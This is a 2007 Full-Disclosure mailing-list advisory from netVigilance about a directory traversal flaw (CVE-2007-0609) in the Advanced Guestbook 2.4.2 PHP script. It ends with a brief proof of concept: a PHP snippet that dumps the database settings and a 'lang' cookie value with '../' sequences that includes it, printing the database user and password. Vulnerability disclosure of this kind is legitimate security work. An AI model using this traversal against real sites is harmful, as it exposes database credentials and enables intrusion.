[Full-disclosure] Advanced Guestbook version 2.4.2 Directory Traversal Vulnerability
- From: "SecurityResearch" <securityresearch@xxxxxxxxxxxxxxxx>
- Date: Mon, 7 May 2007 17:25:08 -0700
netVigilance Security Advisory #13
Advanced Guestbook version 2.4.2 Directory Traversal Vulnerability
Advanced Guestbook is a PHP-based guestbook script. It includes many useful features such as preview, templates, e-mail notification, picture upload, page spanning , html tags handling, smiles, advanced guestbook codes and language support. The admin script lets you modify, view, and delete messages. Requires PHP4 and MySQL.
Mitre CVE: CVE-2007-0609
NVD NIST: CVE-2007-0609
Advanced Guestbook is a PHP-based guestbook with admin interface.
Security problems in the product allow attackers to conduct directory traversal attacks.
This vulnerabilities can be exploited only when attacker has registered on the same server.
Access Vector: Remote
Access Complexity: High
Confidentiality Impact: Complete
Integrity Impact: Complete
Availability Impact: Complete
Impact Bias: Normal
CVSS Base Score: 8
Target Distribution on Internet: Low
Exploitability: Functional Exploit
Remediation Level: Workaround
Report Confidence: Uncorroborated
Vulnerability Impact: Attack
Host Impact: Directory Traversal
SecureScout Testcase ID:
Advanced Guestbook 2.4.2
An attacker via the .. (dot dot) sequence can execute his own php-script on the target server.
Contact with the Vendor was established but draft of the security advisory wasn't provided because the Vendor stopped responding to our emails on 9 March 2007. There is no official fix at the release of this Security Advisory
Set Advanced Guestbook default static language.
1. Create php-script like: <?php global $GB_DB; print_r($GB_DB); ?>
2. Set in COOKIES variable lang = "[ via the .. (dot dot) Sequence set the script name on the same server]" for example "../../../hack_www/htdocs/hack"
[dbName] => [CURRENT DB NAME]
[host] => [CURRENT DB HOST]
[user] => [DB USER NAME]
[pass] => [DB USER PASSWORD]
Co-founder netVigilance, Inc
Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia - http://secunia.com/
- Prev by Date: [Full-disclosure] Advanced Guestbook version 2.4.2 Multiple Error Information Leak Vulnerabilities
- Next by Date: [Full-disclosure] 6apart ~el8
- Previous by thread: [Full-disclosure] Advanced Guestbook version 2.4.2 Multiple Error Information Leak Vulnerabilities
- Next by thread: [Full-disclosure] 6apart ~el8